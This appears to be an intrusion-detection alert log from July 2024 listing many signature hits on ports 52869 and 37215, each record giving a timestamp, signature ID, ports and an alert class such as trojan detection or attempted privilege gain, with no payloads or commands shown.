                      Timestamp:07/20/24-23:06:12.946390
                      SID:2831300
                      Source Port:38556
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.983224
                      SID:2027339
                      Source Port:42278
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.447609
                      SID:2025132
                      Source Port:53972
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:48.278742
                      SID:2027339
                      Source Port:43646
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.236888
                      SID:2027339
                      Source Port:39964
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.758558
                      SID:2025132
                      Source Port:58220
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:46.351281
                      SID:2025132
                      Source Port:60106
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.119988
                      SID:2027339
                      Source Port:33312
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.771399
                      SID:2829579
                      Source Port:45732
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.632782
                      SID:2027339
                      Source Port:60022
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.953817
                      SID:2835222
                      Source Port:40632
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:23.323671
                      SID:2027339
                      Source Port:60792
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.470552
                      SID:2025132
                      Source Port:52964
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.884914
                      SID:2025132
                      Source Port:34726
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.039093
                      SID:2829579
                      Source Port:42684
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.120793
                      SID:2835222
                      Source Port:39874
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:08.171917
                      SID:2025132
                      Source Port:36752
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:14.572816
                      SID:2025132
                      Source Port:53414
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:38.034462
                      SID:2027339
                      Source Port:50470
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:44.280799
                      SID:2027339
                      Source Port:57474
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.027141
                      SID:2831300
                      Source Port:40532
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:01.208471
                      SID:2027339
                      Source Port:59396
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:12.532322
                      SID:2027339
                      Source Port:33904
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:17.536919
                      SID:2027339
                      Source Port:58858
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.539655
                      SID:2027339
                      Source Port:55030
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.795331
                      SID:2025132
                      Source Port:45754
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:17.529212
                      SID:2025132
                      Source Port:53506
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:08.345878
                      SID:2025132
                      Source Port:60774
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:33.863826
                      SID:2835222
                      Source Port:47604
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.714639
                      SID:2025132
                      Source Port:56280
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:33.862992
                      SID:2829579
                      Source Port:32850
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:13.720163
                      SID:2025132
                      Source Port:44350
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:58.954116
                      SID:2027339
                      Source Port:46216
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:06.906932
                      SID:2027339
                      Source Port:51350
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.219051
                      SID:2829579
                      Source Port:51312
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.339999
                      SID:2829579
                      Source Port:38120
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.324397
                      SID:2835222
                      Source Port:48534
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.158457
                      SID:2027339
                      Source Port:49158
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.549030
                      SID:2831300
                      Source Port:48284
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:38.067768
                      SID:2027339
                      Source Port:50764
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:23.241818
                      SID:2025132
                      Source Port:38168
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:45.079907
                      SID:2027339
                      Source Port:45802
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.857672
                      SID:2025132
                      Source Port:39672
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:08.130839
                      SID:2027339
                      Source Port:44556
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.160489
                      SID:2831300
                      Source Port:60714
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:20.550859
                      SID:2025132
                      Source Port:43604
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.493635
                      SID:2831300
                      Source Port:46442
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.057513
                      SID:2027339
                      Source Port:36628
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.922651
                      SID:2027339
                      Source Port:39830
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:08.320378
                      SID:2027339
                      Source Port:41788
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.135703
                      SID:2835222
                      Source Port:59418
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.164569
                      SID:2025132
                      Source Port:39920
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:10.507185
                      SID:2027339
                      Source Port:48028
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.069869
                      SID:2027339
                      Source Port:55724
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.776696
                      SID:2025132
                      Source Port:47418
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.353037
                      SID:2831300
                      Source Port:35080
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:12.589035
                      SID:2025132
                      Source Port:35032
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:48.237594
                      SID:2027339
                      Source Port:35034
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.200523
                      SID:2027339
                      Source Port:43010
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.437168
                      SID:2027339
                      Source Port:55826
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:19.646919
                      SID:2025132
                      Source Port:55558
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:42.233806
                      SID:2835222
                      Source Port:60236
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.953099
                      SID:2025132
                      Source Port:37874
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:20.646576
                      SID:2831300
                      Source Port:43270
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:42.134564
                      SID:2835222
                      Source Port:51570
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.180899
                      SID:2829579
                      Source Port:55614
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.384426
                      SID:2027339
                      Source Port:41354
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.747656
                      SID:2829579
                      Source Port:52158
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.615698
                      SID:2027339
                      Source Port:34622
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.874102
                      SID:2027339
                      Source Port:42518
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:16.383377
                      SID:2831300
                      Source Port:49256
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:36.327720
                      SID:2829579
                      Source Port:47036
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.420492
                      SID:2025132
                      Source Port:47080
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:45.253781
                      SID:2025132
                      Source Port:51558
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.545166
                      SID:2027339
                      Source Port:42944
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.124566
                      SID:2835222
                      Source Port:37420
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.510827
                      SID:2829579
                      Source Port:45192
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:48.772924
                      SID:2027339
                      Source Port:57778
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.748136
                      SID:2025132
                      Source Port:42692
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.239089
                      SID:2831300
                      Source Port:50550
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:16.903590
                      SID:2831300
                      Source Port:59238
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:47.711117
                      SID:2027339
                      Source Port:38450
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.454601
                      SID:2027339
                      Source Port:35194
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:08.034671
                      SID:2027339
                      Source Port:57322
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.086216
                      SID:2835222
                      Source Port:48294
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.972621
                      SID:2831300
                      Source Port:32926
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:58.104584
                      SID:2027339
                      Source Port:44294
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.439167
                      SID:2829579
                      Source Port:44886
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.129772
                      SID:2835222
                      Source Port:60814
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:04.023969
                      SID:2025132
                      Source Port:34090
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.947146
                      SID:2025132
                      Source Port:60902
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:13.800662
                      SID:2025132
                      Source Port:41474
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:58.374852
                      SID:2027339
                      Source Port:58538
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.437584
                      SID:2835222
                      Source Port:36536
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.525782
                      SID:2025132
                      Source Port:43378
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.194696
                      SID:2027339
                      Source Port:42488
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:29.669261
                      SID:2025132
                      Source Port:41746
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:18.910196
                      SID:2027339
                      Source Port:59688
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.919214
                      SID:2025132
                      Source Port:33030
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.166678
                      SID:2027339
                      Source Port:35868
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.460569
                      SID:2835222
                      Source Port:35576
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.904970
                      SID:2831300
                      Source Port:41030
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:12.589035
                      SID:2025132
                      Source Port:33256
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.328888
                      SID:2835222
                      Source Port:42990
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.164212
                      SID:2025132
                      Source Port:48654
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:02.171459
                      SID:2027339
                      Source Port:43504
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.122085
                      SID:2025132
                      Source Port:53188
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:15.141369
                      SID:2831300
                      Source Port:41404
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:40.359038
                      SID:2027339
                      Source Port:33970
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.237871
                      SID:2835222
                      Source Port:59948
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.653975
                      SID:2025132
                      Source Port:46252
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:42.256029
                      SID:2835222
                      Source Port:40820
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.571972
                      SID:2831300
                      Source Port:54350
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.342606
                      SID:2831300
                      Source Port:52790
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.480940
                      SID:2831300
                      Source Port:60866
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:07:08.060226
                      SID:2025132
                      Source Port:60970
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:00.756790
                      SID:2831300
                      Source Port:45572
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:23.209420
                      SID:2027339
                      Source Port:45560
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.463480
                      SID:2027339
                      Source Port:58736
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.123567
                      SID:2027339
                      Source Port:42616
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:10.010711
                      SID:2025132
                      Source Port:33274
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.443720
                      SID:2027339
                      Source Port:45126
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:36.969912
                      SID:2027339
                      Source Port:35792
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.271822
                      SID:2835222
                      Source Port:59282
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:31.841865
                      SID:2831300
                      Source Port:56898
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:40.341196
                      SID:2027339
                      Source Port:47600
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.207185
                      SID:2027339
                      Source Port:41982
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:40.850874
                      SID:2027339
                      Source Port:47864
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:08.369781
                      SID:2027339
                      Source Port:43772
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:27.421231
                      SID:2027339
                      Source Port:42924
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.221844
                      SID:2835222
                      Source Port:49484
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.974933
                      SID:2831300
                      Source Port:40242
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.257734
                      SID:2831300
                      Source Port:41878
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:08.143841
                      SID:2831300
                      Source Port:47462
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:40.423413
                      SID:2831300
                      Source Port:40810
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:11.695372
                      SID:2831300
                      Source Port:58470
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:17.709098
                      SID:2027339
                      Source Port:44064
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.584377
                      SID:2025132
                      Source Port:44716
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:56.877705
                      SID:2025132
                      Source Port:39820
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.440253
                      SID:2027339
                      Source Port:51908
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.344189
                      SID:2027339
                      Source Port:56976
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.874908
                      SID:2027339
                      Source Port:33830
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:47.557250
                      SID:2027339
                      Source Port:40628
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.906796
                      SID:2027339
                      Source Port:44770
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.925983
                      SID:2027339
                      Source Port:36106
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:05.732595
                      SID:2831300
                      Source Port:53432
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:01.795331
                      SID:2027339
                      Source Port:58292
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:06.283235
                      SID:2025132
                      Source Port:39486
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:38.587931
                      SID:2025132
                      Source Port:37492
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:48.763322
                      SID:2835222
                      Source Port:49088
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:17.614211
                      SID:2027339
                      Source Port:50192
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.326250
                      SID:2027339
                      Source Port:46456
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:10.782901
                      SID:2831300
                      Source Port:51518
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:36.323663
                      SID:2829579
                      Source Port:34922
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.257816
                      SID:2835222
                      Source Port:39472
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.209942
                      SID:2831300
                      Source Port:32808
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.464931
                      SID:2027339
                      Source Port:52564
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:16.535822
                      SID:2025132
                      Source Port:39732
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.916130
                      SID:2025132
                      Source Port:41310
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.468942
                      SID:2831300
                      Source Port:49062
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:35.253230
                      SID:2025132
                      Source Port:48432
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:38.912153
                      SID:2027339
                      Source Port:55924
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.523772
                      SID:2025132
                      Source Port:42614
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.463271
                      SID:2027339
                      Source Port:42232
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.219051
                      SID:2829579
                      Source Port:55142
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:36.644546
                      SID:2025132
                      Source Port:53318
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.323651
                      SID:2829579
                      Source Port:37816
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.511430
                      SID:2025132
                      Source Port:47820
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:02.378063
                      SID:2831300
                      Source Port:37580
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:15.999787
                      SID:2027339
                      Source Port:34034
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.170455
                      SID:2025132
                      Source Port:56292
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.570834
                      SID:2831300
                      Source Port:42140
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:35.197096
                      SID:2025132
                      Source Port:36626
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:17.411596
                      SID:2025132
                      Source Port:42704
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:42.257476
                      SID:2829579
                      Source Port:40240
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.047734
                      SID:2829579
                      Source Port:42434
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:04.458817
                      SID:2027339
                      Source Port:33338
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:17.661736
                      SID:2027339
                      Source Port:55024
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.483611
                      SID:2027339
                      Source Port:45290
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:11.236923
                      SID:2027339
                      Source Port:43176
                      Destination Port:52869
                      Protocol:TCP
